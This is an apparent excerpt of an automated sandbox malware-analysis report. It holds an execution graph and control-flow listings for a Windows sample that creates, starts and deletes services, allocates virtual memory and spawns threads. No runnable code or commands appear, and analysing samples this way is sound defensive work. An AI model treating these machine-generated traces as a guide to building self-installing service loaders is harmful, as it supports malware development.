                                  • Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

                                  Execution Graph

                                  Execution Coverage:2.1%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:462
                                  Total number of Limit Nodes:10
                                  execution_graph 14017 140005df3 14018 140005e71 14017->14018 14019 140005e84 CreateFileA 14018->14019 14020 140005f50 _SetImageBase 14019->14020 14021 140005fc3 malloc ReadFile 14020->14021 15177 140007412 15178 140007333 15177->15178 15179 140007403 15178->15179 15180 1400073e0 LdrLoadDll 15178->15180 15180->15178 15613 140013670 InitializeCriticalSection CreateEventW CreateEventW CreateEventW 15616 1400054e0 15613->15616 15615 1400136ef 15617 14000552c 15616->15617 15620 140005506 _lock 15616->15620 15618 1400074d0 LdrLoadDll 15617->15618 15619 140005536 15618->15619 15621 140008370 3 API calls 15619->15621 15620->15615 15625 140005545 _SetImageBase 15621->15625 15622 1400055b8 15623 140008de0 _lock 2 API calls 15622->15623 15624 1400055c0 sprintf_s 15623->15624 15624->15620 15625->15622 15626 1400074f0 LdrLoadDll 15625->15626 15627 140005561 CreateThread 15626->15627 15627->15624 15628 1400055b0 GetLastError 15627->15628 15628->15622 14026 140005a70 GetStartupInfoW GetProcessHeap HeapAlloc 14027 140005ab1 14026->14027 14028 140005add GetVersionExA 14026->14028 14029 140005abf 14027->14029 14076 140009540 14027->14076 14030 140005b0e GetProcessHeap HeapFree 14028->14030 14031 140005af0 GetProcessHeap HeapFree 14028->14031 14084 140009300 14029->14084 14036 140005b3c 14030->14036 14034 140005d0b 14031->14034 14035 140005ac9 14095 140008510 GetModuleHandleA 14035->14095 14099 14000a310 HeapCreate 14036->14099 14039 140005bec 14040 140005c12 14039->14040 14041 140005bf0 14039->14041 14043 140005c17 14040->14043 14042 140005bfe 14041->14042 14044 140009540 _lock 12 API calls 14041->14044 14045 140009300 _lock 10 API calls 14042->14045 14046 140005c3d 14043->14046 14048 140005c29 14043->14048 14050 140009540 _lock 12 API calls 14043->14050 14044->14042 14047 140005c08 14045->14047 14102 140009f50 GetStartupInfoA 14046->14102 14049 140008510 _lock 3 API calls 14047->14049 14051 140009300 _lock 10 API calls 14048->14051 14049->14040 14050->14048 14052 140005c33 14051->14052 14054 140008510 _lock 3 API calls 14052->14054 14054->14046 14056 140005c56 14122 140009e30 14056->14122 14059 140005c5b 14140 140009c30 14059->14140 14063 140005c73 14064 140005c81 14063->14064 14065 1400084e0 _lock 12 API calls 14063->14065 14170 140009690 14064->14170 14065->14064 14067 140005c86 14068 140005c94 14067->14068 14069 1400084e0 _lock 12 API calls 14067->14069 14182 140008650 14068->14182 14069->14068 14071 140005c9e 14072 1400084e0 _lock 12 API calls 14071->14072 14073 140005ca9 14071->14073 14072->14073 14186 140001520 14073->14186 14075 140005ad3 14075->14034 14082 14000954e _lock 14076->14082 14077 14000961c 14077->14029 14078 14000959c 14079 140009300 _lock 10 API calls 14078->14079 14079->14077 14080 1400095c9 GetStdHandle 14080->14078 14081 1400095dc 14080->14081 14081->14078 14083 1400095e2 WriteFile 14081->14083 14082->14077 14082->14078 14082->14080 14083->14078 14087 140009320 _lock 14084->14087 14085 140009330 14085->14035 14086 1400094dc GetStdHandle 14086->14085 14088 1400094ef 14086->14088 14087->14085 14087->14086 14090 140009375 _lock 14087->14090 14088->14085 14089 1400094f5 WriteFile 14088->14089 14089->14085 14090->14085 14091 1400093b9 GetModuleFileNameA 14090->14091 14092 1400093d9 _lock 14091->14092 14204 14000f000 14092->14204 14096 140008543 ExitProcess 14095->14096 14097 14000852a GetProcAddress 14095->14097 14097->14096 14098 14000853f 14097->14098 14098->14096 14100 14000a334 14099->14100 14101 14000a339 HeapSetInformation 14099->14101 14100->14039 14101->14039 14230 140008370 14102->14230 14104 14000a1c4 GetStdHandle 14108 14000a17c 14104->14108 14105 140008370 3 API calls 14109 140009f8a 14105->14109 14106 14000a239 SetHandleCount 14114 140005c48 14106->14114 14107 14000a1d8 GetFileType 14107->14108 14108->14104 14108->14106 14108->14107 14113 14000edc0 _lock 3 API calls 14108->14113 14108->14114 14109->14105 14109->14108 14110 14000a0e3 14109->14110 14109->14114 14110->14108 14111 14000a11c GetFileType 14110->14111 14110->14114 14235 14000edc0 14110->14235 14111->14110 14113->14108 14114->14056 14115 1400084e0 14114->14115 14116 140009540 _lock 12 API calls 14115->14116 14117 1400084ed 14116->14117 14118 140009300 _lock 10 API calls 14117->14118 14119 1400084f4 14118->14119 14120 1400073e0 _lock LdrLoadDll 14119->14120 14121 140008500 14120->14121 14123 140009e7c 14122->14123 14124 140009e3e GetCommandLineW 14122->14124 14127 140009e81 GetCommandLineW 14123->14127 14129 140009e69 14123->14129 14125 140009e49 GetCommandLineW 14124->14125 14126 140009e5e GetLastError 14124->14126 14125->14126 14128 140009e75 14126->14128 14126->14129 14127->14129 14128->14059 14129->14128 14130 140009e91 GetCommandLineA MultiByteToWideChar 14129->14130 14131 140009ec8 14130->14131 14132 140009ed9 14130->14132 14131->14059 14133 140008370 3 API calls 14132->14133 14134 140009eeb 14133->14134 14135 140009f32 14134->14135 14136 140009ef3 MultiByteToWideChar 14134->14136 14135->14059 14137 140009f13 14136->14137 14138 140009f2a 14136->14138 14137->14059 14249 140008de0 14138->14249 14141 140009c52 GetEnvironmentStringsW 14140->14141 14142 140009c86 14140->14142 14143 140009c6c GetLastError 14141->14143 14149 140009c60 14141->14149 14144 140009c91 GetEnvironmentStringsW 14142->14144 14145 140009c77 14142->14145 14143->14142 14143->14145 14147 140005c67 14144->14147 14144->14149 14146 140009d09 GetEnvironmentStrings 14145->14146 14145->14147 14146->14147 14148 140009d17 14146->14148 14166 1400099c0 GetModuleFileNameW 14147->14166 14151 140009d58 14148->14151 14154 140009d20 MultiByteToWideChar 14148->14154 14254 140008300 14149->14254 14152 140008370 3 API calls 14151->14152 14155 140009d68 14152->14155 14154->14147 14154->14148 14158 140009d7d 14155->14158 14159 140009d70 FreeEnvironmentStringsA 14155->14159 14156 140009ce1 __CxxFrameHandler 14161 140009cef FreeEnvironmentStringsW 14156->14161 14157 140009cd1 FreeEnvironmentStringsW 14157->14147 14160 140009de5 FreeEnvironmentStringsA 14158->14160 14162 140009d90 MultiByteToWideChar 14158->14162 14159->14147 14160->14147 14161->14147 14162->14158 14163 140009e0e 14162->14163 14164 140008de0 _lock 2 API calls 14163->14164 14165 140009e16 FreeEnvironmentStringsA 14164->14165 14165->14147 14167 140009a03 14166->14167 14168 140008300 _lock 17 API calls 14167->14168 14169 140009bca 14167->14169 14168->14169 14169->14063 14171 1400096b2 14170->14171 14172 1400096a8 14170->14172 14173 140008370 3 API calls 14171->14173 14172->14067 14181 1400096fa 14173->14181 14174 140009709 14174->14067 14175 1400097a5 14176 140008de0 _lock 2 API calls 14175->14176 14177 1400097b4 14176->14177 14177->14067 14178 140008370 3 API calls 14178->14181 14179 1400097e5 14180 140008de0 _lock 2 API calls 14179->14180 14180->14177 14181->14174 14181->14175 14181->14178 14181->14179 14184 140008666 14182->14184 14185 1400086bf 14184->14185 14270 140005380 14184->14270 14185->14071 14187 140001565 14186->14187 14188 140001569 14187->14188 14189 14000157e 14187->14189 14308 140001430 GetModuleFileNameW OpenSCManagerW 14188->14308 14192 140001595 OpenSCManagerW 14189->14192 14193 14000164f 14189->14193 14196 1400015b2 GetLastError 14192->14196 14197 1400015cf OpenServiceW 14192->14197 14194 140001654 14193->14194 14195 140001669 StartServiceCtrlDispatcherW 14193->14195 14317 1400011f0 14194->14317 14195->14075 14196->14075 14199 140001611 DeleteService 14197->14199 14200 1400015e9 GetLastError CloseServiceHandle 14197->14200 14201 140001626 CloseServiceHandle CloseServiceHandle 14199->14201 14202 14000161e GetLastError 14199->14202 14200->14075 14201->14075 14202->14201 14205 14000f01e _lock 14204->14205 14206 14000f03b LoadLibraryA 14205->14206 14226 14000f125 _lock 14205->14226 14207 14000f054 GetProcAddress 14206->14207 14208 1400094c9 14206->14208 14207->14208 14209 14000f06d _lock 14207->14209 14208->14035 14213 14000f075 GetProcAddress 14209->14213 14211 1400073e0 _lock LdrLoadDll 14211->14208 14212 1400073e0 _lock LdrLoadDll 14219 14000f1e9 14212->14219 14215 140007220 _lock 14213->14215 14217 14000f094 GetProcAddress 14215->14217 14216 1400073e0 _lock LdrLoadDll 14218 14000f165 14216->14218 14221 14000f0b3 _lock 14217->14221 14218->14212 14222 14000f1a3 _lock 14218->14222 14220 1400073e0 _lock LdrLoadDll 14219->14220 14219->14222 14220->14222 14223 14000f0e9 GetProcAddress 14221->14223 14221->14226 14222->14211 14224 14000f101 _lock 14223->14224 14225 14000f10d GetProcAddress 14224->14225 14224->14226 14225->14226 14226->14218 14227 1400073e0 LdrLoadDll 14226->14227 14229 140007333 14227->14229 14228 140007403 14228->14216 14229->14227 14229->14228 14232 1400083a0 14230->14232 14233 1400083e0 14232->14233 14234 1400083be Sleep 14232->14234 14241 14000e850 14232->14241 14233->14109 14234->14232 14234->14233 14236 1400073e0 _lock LdrLoadDll 14235->14236 14237 14000edec _lock 14236->14237 14238 14000ee1d _lock 14237->14238 14239 14000ee26 GetModuleHandleA 14237->14239 14238->14110 14239->14238 14240 14000ee38 GetProcAddress 14239->14240 14240->14238 14242 14000e865 14241->14242 14243 14000e8be HeapAlloc 14242->14243 14245 14000e876 _lock 14242->14245 14246 1400090b0 14242->14246 14243->14242 14243->14245 14245->14232 14247 1400073e0 _lock LdrLoadDll 14246->14247 14248 1400090c5 14247->14248 14248->14242 14250 140008de9 HeapFree 14249->14250 14253 140008e19 _lock 14249->14253 14251 140008dff _lock 14250->14251 14250->14253 14252 140008e09 GetLastError 14251->14252 14252->14253 14253->14135 14255 140008320 14254->14255 14257 140008358 14255->14257 14258 140008338 Sleep 14255->14258 14259 1400090f0 14255->14259 14257->14156 14257->14157 14258->14255 14258->14257 14260 14000919e 14259->14260 14265 140009103 14259->14265 14261 1400090b0 _lock LdrLoadDll 14260->14261 14263 1400091a3 _lock 14261->14263 14262 14000914c HeapAlloc 14262->14265 14269 140009173 _lock 14262->14269 14263->14255 14264 140009540 _lock 12 API calls 14264->14265 14265->14262 14265->14264 14266 140009300 _lock 10 API calls 14265->14266 14267 1400090b0 _lock LdrLoadDll 14265->14267 14268 140008510 _lock 3 API calls 14265->14268 14265->14269 14266->14265 14267->14265 14268->14265 14269->14255 14273 140005250 14270->14273 14272 140005389 14272->14185 14274 140005271 14273->14274 14275 1400073e0 _lock LdrLoadDll 14274->14275 14276 14000527e 14275->14276 14277 1400073e0 _lock LdrLoadDll 14276->14277 14278 14000528d 14277->14278 14284 1400052f0 _lock 14278->14284 14285 140008490 14278->14285 14280 1400052b5 14281 1400052d9 14280->14281 14280->14284 14288 140008400 14280->14288 14283 140008400 7 API calls 14281->14283 14281->14284 14283->14284 14284->14272 14286 1400084c5 HeapSize 14285->14286 14287 140008499 _lock 14285->14287 14287->14280 14290 140008430 14288->14290 14291 140008450 Sleep 14290->14291 14292 140008472 14290->14292 14293 14000e920 14290->14293 14291->14290 14291->14292 14292->14281 14294 14000e935 14293->14294 14295 14000e94c 14294->14295 14305 14000e95e 14294->14305 14297 140008de0 _lock 2 API calls 14295->14297 14296 14000e9b1 14299 1400090b0 _lock LdrLoadDll 14296->14299 14300 14000e951 14297->14300 14298 14000e973 HeapReAlloc 14301 14000e9b9 _lock 14298->14301 14298->14305 14299->14301 14300->14290 14301->14290 14302 14000e9f4 _lock 14304 14000e9f9 GetLastError 14302->14304 14303 1400090b0 _lock LdrLoadDll 14303->14305 14304->14301 14305->14296 14305->14298 14305->14302 14305->14303 14306 14000e9db _lock 14305->14306 14307 14000e9e0 GetLastError 14306->14307 14307->14301 14309 140001482 CreateServiceW 14308->14309 14310 14000147a GetLastError 14308->14310 14312 1400014ea GetLastError 14309->14312 14313 1400014df CloseServiceHandle 14309->14313 14311 1400014fd 14310->14311 14323 140004f30 14311->14323 14314 1400014f2 CloseServiceHandle 14312->14314 14313->14314 14314->14311 14316 14000150d 14316->14075 14318 1400011fa 14317->14318 14332 1400051d0 14318->14332 14321 140004f30 sprintf_s NtAllocateVirtualMemory 14322 140001262 14321->14322 14322->14075 14325 140004f39 _SetImageBase 14323->14325 14324 140004f44 14324->14316 14325->14324 14328 140006c95 14325->14328 14327 14000660e sprintf_s 14327->14316 14330 140006d7b 14328->14330 14331 140006d9d 14328->14331 14329 140006f95 NtAllocateVirtualMemory 14329->14331 14330->14329 14330->14331 14331->14327 14335 140008270 14332->14335 14334 140001238 MessageBoxW 14334->14321 14336 14000827e 14335->14336 14338 1400082ac _lock 14335->14338 14336->14338 14339 140008120 14336->14339 14338->14334 14340 14000816a 14339->14340 14344 14000813b _lock 14339->14344 14342 1400081d7 14340->14342 14340->14344 14345 140007f50 14340->14345 14343 140007f50 sprintf_s 54 API calls 14342->14343 14342->14344 14343->14344 14344->14338 14354 140007f69 sprintf_s 14345->14354 14346 140007f74 _lock 14346->14342 14347 14000801d 14348 1400080d5 14347->14348 14349 14000802f 14347->14349 14350 14000cc00 sprintf_s 54 API calls 14348->14350 14351 14000804c 14349->14351 14353 140008081 14349->14353 14356 140008056 14350->14356 14361 14000cc00 14351->14361 14353->14356 14369 14000c2a0 14353->14369 14354->14346 14354->14347 14358 14000cd50 14354->14358 14356->14342 14359 140008300 _lock 17 API calls 14358->14359 14360 14000cd6a 14359->14360 14360->14347 14362 14000cc3f 14361->14362 14368 14000cc23 _lock sprintf_s 14361->14368 14362->14368 14377 14000fc50 14362->14377 14366 14000ccc5 _lock sprintf_s 14422 14000fd20 LeaveCriticalSection 14366->14422 14368->14356 14370 14000c2c3 _lock sprintf_s 14369->14370 14371 14000c2e0 14369->14371 14370->14356 14371->14370 14372 14000fc50 sprintf_s 25 API calls 14371->14372 14373 14000c34e 14372->14373 14374 14000c1f0 sprintf_s 2 API calls 14373->14374 14375 14000c367 _lock sprintf_s 14373->14375 14374->14375 14456 14000fd20 LeaveCriticalSection 14375->14456 14378 14000fc96 14377->14378 14379 14000fccb 14377->14379 14423 14000b400 14378->14423 14380 14000ccac 14379->14380 14381 14000fccf EnterCriticalSection 14379->14381 14380->14366 14387 14000c3f0 14380->14387 14381->14380 14390 14000c42e 14387->14390 14406 14000c427 _lock sprintf_s 14387->14406 14388 140004f30 sprintf_s NtAllocateVirtualMemory 14389 14000cbe6 14388->14389 14389->14366 14393 14000c4fb _SetImageBase sprintf_s 14390->14393 14390->14406 14450 14000c1f0 14390->14450 14392 14000c841 14394 14000c86a 14392->14394 14395 14000cb20 WriteFile 14392->14395 14393->14392 14398 14000c526 GetConsoleMode 14393->14398 14397 14000c936 14394->14397 14402 14000c876 14394->14402 14396 14000cb53 GetLastError 14395->14396 14395->14406 14396->14406 14403 14000c940 14397->14403 14412 14000ca02 14397->14412 14398->14392 14399 14000c557 14398->14399 14399->14392 14400 14000c564 GetConsoleCP 14399->14400 14400->14406 14418 14000c581 sprintf_s 14400->14418 14401 14000c8c5 WriteFile 14401->14402 14404 14000c928 GetLastError 14401->14404 14402->14401 14402->14406 14403->14406 14407 14000c991 WriteFile 14403->14407 14404->14406 14405 14000ca57 WideCharToMultiByte 14408 14000cb15 GetLastError 14405->14408 14405->14412 14406->14388 14407->14403 14409 14000c9f4 GetLastError 14407->14409 14408->14406 14409->14406 14410 14000cab0 WriteFile 14411 14000caf6 GetLastError 14410->14411 14410->14412 14411->14406 14411->14412 14412->14405 14412->14406 14412->14410 14413 14000fd50 7 API calls sprintf_s 14413->14418 14414 14000c649 WideCharToMultiByte 14414->14406 14415 14000c68c WriteFile 14414->14415 14416 14000c80d GetLastError 14415->14416 14415->14418 14416->14406 14417 14000c829 GetLastError 14417->14406 14418->14406 14418->14413 14418->14414 14418->14417 14419 14000c6e2 WriteFile 14418->14419 14421 14000c81b GetLastError 14418->14421 14419->14418 14420 14000c7ff GetLastError 14419->14420 14420->14406 14421->14406 14424 14000b41e 14423->14424 14425 14000b42f EnterCriticalSection 14423->14425 14429 14000b2f0 14424->14429 14427 14000b423 14427->14425 14428 1400084e0 _lock 12 API calls 14427->14428 14428->14425 14430 14000b317 14429->14430 14431 14000b32e 14429->14431 14432 140009540 _lock 12 API calls 14430->14432 14433 140008300 _lock 17 API calls 14431->14433 14437 14000b342 _lock 14431->14437 14434 14000b31c 14432->14434 14435 14000b350 14433->14435 14436 140009300 _lock 10 API calls 14434->14436 14435->14437 14439 14000b400 _lock 22 API calls 14435->14439 14438 14000b324 14436->14438 14437->14427 14440 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14438->14440 14441 14000b371 14439->14441 14440->14431 14442 14000b3a7 14441->14442 14443 14000b379 14441->14443 14444 140008de0 _lock HeapFree GetLastError 14442->14444 14445 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14443->14445 14449 14000b392 _lock 14444->14449 14446 14000b386 14445->14446 14448 140008de0 _lock HeapFree GetLastError 14446->14448 14446->14449 14447 14000b3b0 LeaveCriticalSection 14447->14437 14448->14449 14449->14447 14451 14000c20c sprintf_s 14450->14451 14452 14000c22c SetFilePointer 14451->14452 14453 14000c212 _lock 14451->14453 14454 14000c24a GetLastError 14452->14454 14455 14000c254 sprintf_s 14452->14455 14453->14393 14454->14455 14455->14393 14022 140006c95 14024 140006d7b 14022->14024 14025 140006d9d 14022->14025 14023 140006f95 NtAllocateVirtualMemory 14023->14025 14024->14023 14024->14025 16219 7ffbc1ba11b0 16220 7ffbc1ba1209 16219->16220 16221 7ffbc1ba1300 _invalid_parameter_noinfo_noreturn 16220->16221 16225 7ffbc1ba12c7 16220->16225 16226 7ffbc1ba129e 16220->16226 16235 7ffbc1ba12b9 BuildCatchObjectHelperInternal 16220->16235 16237 7ffbc1ba14f0 16220->16237 16223 7ffbc1ba1b70 _invalid_parameter_noinfo_noreturn 8 API calls 16221->16223 16222 7ffbc1ba1b90 51 API calls 16222->16221 16227 7ffbc1ba14d3 16223->16227 16229 7ffbc1ba1b90 51 API calls 16225->16229 16228 7ffbc1ba14f6 16226->16228 16238 7ffbc1ba1b90 16226->16238 16250 7ffbc1ba1110 16228->16250 16229->16235 16234 7ffbc1ba14eb 16236 7ffbc1ba79cc _invalid_parameter_noinfo_noreturn 47 API calls 16234->16236 16235->16222 16236->16237 16247 7ffbc1ba1a40 16237->16247 16240 7ffbc1ba1b9b 16238->16240 16239 7ffbc1ba12b0 16239->16234 16239->16235 16240->16239 16241 7ffbc1ba7a4c BuildCatchObjectHelperInternal 2 API calls 16240->16241 16243 7ffbc1ba1bba 16240->16243 16241->16240 16242 7ffbc1ba1bc5 16245 7ffbc1ba1110 Concurrency::cancel_current_task 51 API calls 16242->16245 16243->16242 16256 7ffbc1ba21f0 16243->16256 16246 7ffbc1ba1bcb 16245->16246 16265 7ffbc1ba1b34 16247->16265 16251 7ffbc1ba111e Concurrency::cancel_current_task 16250->16251 16252 7ffbc1ba3990 std::_Xinvalid_argument 2 API calls 16251->16252 16253 7ffbc1ba112f 16252->16253 16254 7ffbc1ba379c __std_exception_copy 49 API calls 16253->16254 16255 7ffbc1ba1159 16254->16255 16257 7ffbc1ba21fe Concurrency::cancel_current_task 16256->16257 16260 7ffbc1ba3990 16257->16260 16259 7ffbc1ba220f 16261 7ffbc1ba39af 16260->16261 16262 7ffbc1ba39d8 RtlPcToFileHeader 16261->16262 16263 7ffbc1ba39fa RaiseException 16261->16263 16264 7ffbc1ba39f0 16262->16264 16263->16259 16264->16263 16270 7ffbc1ba1ab0 16265->16270 16268 7ffbc1ba3990 std::_Xinvalid_argument 2 API calls 16269 7ffbc1ba1b56 16268->16269 16271 7ffbc1ba379c __std_exception_copy 49 API calls 16270->16271 16272 7ffbc1ba1ae4 16271->16272 16272->16268 14457 1400054e0 14458 14000552c 14457->14458 14461 140005506 _lock 14457->14461 14470 1400074d0 14458->14470 14462 140008370 3 API calls 14466 140005545 _SetImageBase 14462->14466 14463 1400055b8 14464 140008de0 _lock 2 API calls 14463->14464 14465 1400055c0 sprintf_s 14464->14465 14465->14461 14466->14463 14474 1400074f0 14466->14474 14469 1400055b0 GetLastError 14469->14463 14472 140007333 14470->14472 14471 140005536 14471->14462 14472->14471 14473 1400073e0 LdrLoadDll 14472->14473 14473->14472 14476 140007333 14474->14476 14475 140005561 CreateThread 14475->14465 14475->14469 14476->14475 14477 1400073e0 LdrLoadDll 14476->14477 14477->14476

                                  Executed Functions

                                  Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 150 140006e96 147->150 151 140006e9b 147->151 149 140006edc-140006ee9 148->149 153 140006f89-140006f8e 149->153 154 140006eef-140006f23 149->154 150->132 151->146 157 140006f95-140006fd6 NtAllocateVirtualMemory 153->157 158 140006f90 153->158 155 140006f25-140006f2d 154->155 156 140006f2f-140006f33 154->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->149 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @$@
                                  • API String ID: 0-149943524
                                  • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                  • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                  • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
                                  Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: File$CreateReadmalloc
                                  • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                  • API String ID: 3950102678-3381721293
                                  • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                  • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                  • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
                                  Function 00007FFBC1BA1C00 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 25 7ffbc1ba1c00-7ffbc1ba1c06 26 7ffbc1ba1c08-7ffbc1ba1c0b 25->26 27 7ffbc1ba1c41-7ffbc1ba1c4b 25->27 29 7ffbc1ba1c35-7ffbc1ba1c74 call 7ffbc1ba2470 26->29 30 7ffbc1ba1c0d-7ffbc1ba1c10 26->30 28 7ffbc1ba1d68-7ffbc1ba1d7d 27->28 34 7ffbc1ba1d8c-7ffbc1ba1da6 call 7ffbc1ba2304 28->34 35 7ffbc1ba1d7f 28->35 47 7ffbc1ba1c7a-7ffbc1ba1c8f call 7ffbc1ba2304 29->47 48 7ffbc1ba1d42 29->48 32 7ffbc1ba1c28 __scrt_dllmain_crt_thread_attach 30->32 33 7ffbc1ba1c12-7ffbc1ba1c15 30->33 36 7ffbc1ba1c2d-7ffbc1ba1c34 32->36 38 7ffbc1ba1c17-7ffbc1ba1c20 33->38 39 7ffbc1ba1c21-7ffbc1ba1c26 call 7ffbc1ba23b4 33->39 45 7ffbc1ba1da8-7ffbc1ba1dd9 call 7ffbc1ba242c call 7ffbc1ba22d4 call 7ffbc1ba27b4 call 7ffbc1ba25d0 call 7ffbc1ba25f4 call 7ffbc1ba245c 34->45 46 7ffbc1ba1ddb-7ffbc1ba1e0c call 7ffbc1ba2630 34->46 40 7ffbc1ba1d81-7ffbc1ba1d8b 35->40 39->36 45->40 57 7ffbc1ba1e0e-7ffbc1ba1e14 46->57 58 7ffbc1ba1e1d-7ffbc1ba1e23 46->58 60 7ffbc1ba1c95-7ffbc1ba1ca6 call 7ffbc1ba2374 47->60 61 7ffbc1ba1d5a-7ffbc1ba1d67 call 7ffbc1ba2630 47->61 51 7ffbc1ba1d44-7ffbc1ba1d59 48->51 57->58 62 7ffbc1ba1e16-7ffbc1ba1e18 57->62 63 7ffbc1ba1e65-7ffbc1ba1e6d call 7ffbc1ba1720 58->63 64 7ffbc1ba1e25-7ffbc1ba1e2f 58->64 77 7ffbc1ba1ca8-7ffbc1ba1ccc call 7ffbc1ba2778 call 7ffbc1ba22c4 call 7ffbc1ba22e8 call 7ffbc1ba7b10 60->77 78 7ffbc1ba1cf7-7ffbc1ba1d01 call 7ffbc1ba25d0 60->78 61->28 68 7ffbc1ba1f02-7ffbc1ba1f0f 62->68 79 7ffbc1ba1e72-7ffbc1ba1e7b 63->79 69 7ffbc1ba1e36-7ffbc1ba1e3c 64->69 70 7ffbc1ba1e31-7ffbc1ba1e34 64->70 75 7ffbc1ba1e3e-7ffbc1ba1e44 69->75 70->75 84 7ffbc1ba1ef8-7ffbc1ba1f00 75->84 85 7ffbc1ba1e4a-7ffbc1ba1e5f call 7ffbc1ba1c00 75->85 77->78 127 7ffbc1ba1cce-7ffbc1ba1cd5 __scrt_dllmain_after_initialize_c 77->127 78->48 101 7ffbc1ba1d03-7ffbc1ba1d0f call 7ffbc1ba2620 78->101 80 7ffbc1ba1eb3-7ffbc1ba1eb5 79->80 81 7ffbc1ba1e7d-7ffbc1ba1e7f 79->81 90 7ffbc1ba1eb7-7ffbc1ba1eba 80->90 91 7ffbc1ba1ebc-7ffbc1ba1ed1 call 7ffbc1ba1c00 80->91 81->80 88 7ffbc1ba1e81-7ffbc1ba1ea3 call 7ffbc1ba1720 call 7ffbc1ba1d68 81->88 84->68 85->63 85->84 88->80 121 7ffbc1ba1ea5-7ffbc1ba1eaa 88->121 90->84 90->91 91->84 110 7ffbc1ba1ed3-7ffbc1ba1edd 91->110 112 7ffbc1ba1d35-7ffbc1ba1d40 101->112 113 7ffbc1ba1d11-7ffbc1ba1d1b call 7ffbc1ba2538 101->113 117 7ffbc1ba1ee4-7ffbc1ba1ef2 110->117 118 7ffbc1ba1edf-7ffbc1ba1ee2 110->118 112->51 113->112 126 7ffbc1ba1d1d-7ffbc1ba1d2b 113->126 122 7ffbc1ba1ef4 117->122 118->122 121->80 122->84 126->112 127->78 128 7ffbc1ba1cd7-7ffbc1ba1cf4 call 7ffbc1ba7acc 127->128 128->78
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
